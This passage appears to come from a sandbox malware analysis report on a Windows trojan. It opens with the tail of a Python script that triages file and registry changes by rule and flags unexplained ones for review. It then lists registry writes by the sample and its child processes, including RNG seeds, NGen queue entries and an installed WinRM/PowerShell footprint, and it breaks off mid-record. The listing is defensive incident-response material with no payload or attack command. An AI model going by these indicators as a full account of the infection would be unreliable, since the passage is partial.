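    ("cryptoapi-seed", re.compile(r"\\Cryptography\\RNG$", re.I)),
    ("ngen-queue", re.compile(r"\\\.NETFramework\\v[\d.]+\\NGenService\\", re.I)),
]

def classify(item, rules):
    """Return the first matching verdict, or 'review' when no rule explains the item."""
    for verdict, rx in rules:
        if rx.search(item):
            return verdict
    return "review"

def parse_report(text):
    """Yield (kind, process, pid, action, item, detail, verdict) for every file or registry entry."""
    proc = pid = action = key = None
    for raw in text.splitlines():
        line = raw.strip()
        if m := PROC_RE.match(line):
            proc, pid, key = m.group("proc"), int(m.group("pid")), None
        elif m := ACTION_RE.match(line):
            action = "delete" if m.group("action") == "deletes" else "write"
        elif m := FILE_RE.match(line):
            path = m.group("path")
            yield ("file", proc, pid, action, path, int(m.group("size")), classify(path, FILE_RULES))
        elif m := KEY_RE.match(line):
            key = m.group("key")
        elif (m := VALUE_RE.match(line)) and key:
            yield ("reg", proc, pid, action, key, f'{m.group("name")}={m.group("value")}', classify(key, REG_RULES))

def triage(text):
    """Count verdicts and return the entries a human still has to look at."""
    rows = list(parse_report(text))
    counts = Counter(r[-1] for r in rows)
    review = [r for r in rows if r[-1] == "review"]
    return rows, counts, review

if __name__ == "__main__":
    rows, counts, review = triage(SAMPLE_REPORT)
    for verdict, n in sorted(counts.items()):
        print(f"{verdict:18s} {n}")
    print("needs review:")
    for kind, proc, pid, action, item, detail, _ in review:
        print(f"  {kind:4s} {proc}:{pid} {action:6s} {item} [{detail}]")
```

Feed the whole report text to triage() instead of SAMPLE_REPORT to get the full split. Anything left in the review list is where the analyst's time should go; the installer footprint should instead be checked on a compromised host for what it implies, since a WinRM 2.0 install on an XP machine that never had it is itself a remote-shell exposure worth confirming or removing.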

Registry activity

The process mofcomp.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 26 4C 2D 5E 4C 0E 29 01 B1 2C 37 8D 24 19 A6"

The process WindowsXP-KB968930-x86-ENG.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 58 17 DB 74 91 CC 3E 14 5B 60 F5 D5 16 94 EF"

The process ngen.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 BD 81 F0 8A 43 51 B2 18 F5 92 0F 6C DC 9C 37"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 DC 66 58 D8 83 A4 66 C6 5D 9A DE 5E 9D 1D 19"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 7A FF BD 73 FC B1 6F E1 C8 2B AC F7 41 C4 E8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 9C 99 84 C9 AE 72 9F BB 2B 96 BE 1E 16 32 B8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 E8 25 0C 96 ED 5D 5D C6 D8 5E F1 B4 49 5A 07"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 7B 3C C1 48 FC 3C 26 89 C5 D8 F2 33 D7 1B 24"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 45 DC C4 E0 AD F5 2C F4 0A EF 3C 8A 87 9B 3A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 7C 07 2A FB CC 8B A0 C6 3E 33 08 5B 16 66 F9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 D0 BC 25 C6 66 6D 2B 85 18 91 32 FE CD 5A 2B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 2C 3F A3 4F 14 67 5D DB 11 E3 E9 5A D1 C4 77"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 B8 FF B8 93 C6 C8 A6 A7 03 AA 10 CE 53 C6 67"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 7C 7B 97 70 7B FA 20 F0 DC B7 2C 3B F2 06 62"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 9B FC BB 98 8C 06 52 F5 04 49 E7 CA 5D 0C 8C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 6C 60 BE C9 CB E9 65 60 CD 7C 64 C3 53 7F 86"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 5C AE 8D 4B A7 4A D3 3B 4C D1 46 BF 19 7D 0D"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 3F 53 B9 00 C7 2E 02 6C 68 72 D1 B2 B0 8A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 2A C1 8E BB E7 E8 B4 26 85 38 4F A2 22 90 86"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 38 35 05 F7 59 9D CF E4 A9 AC 2D BE 1A D9 5E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process %original file name%.exe:148 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 56 2D 9D 70 8C 41 80 4E 82 D8 BC 11 F1 5C 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 63 B4 A0 BD F0 85 98 30 23 61 BC 7F 25 5B A2"

The process update.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
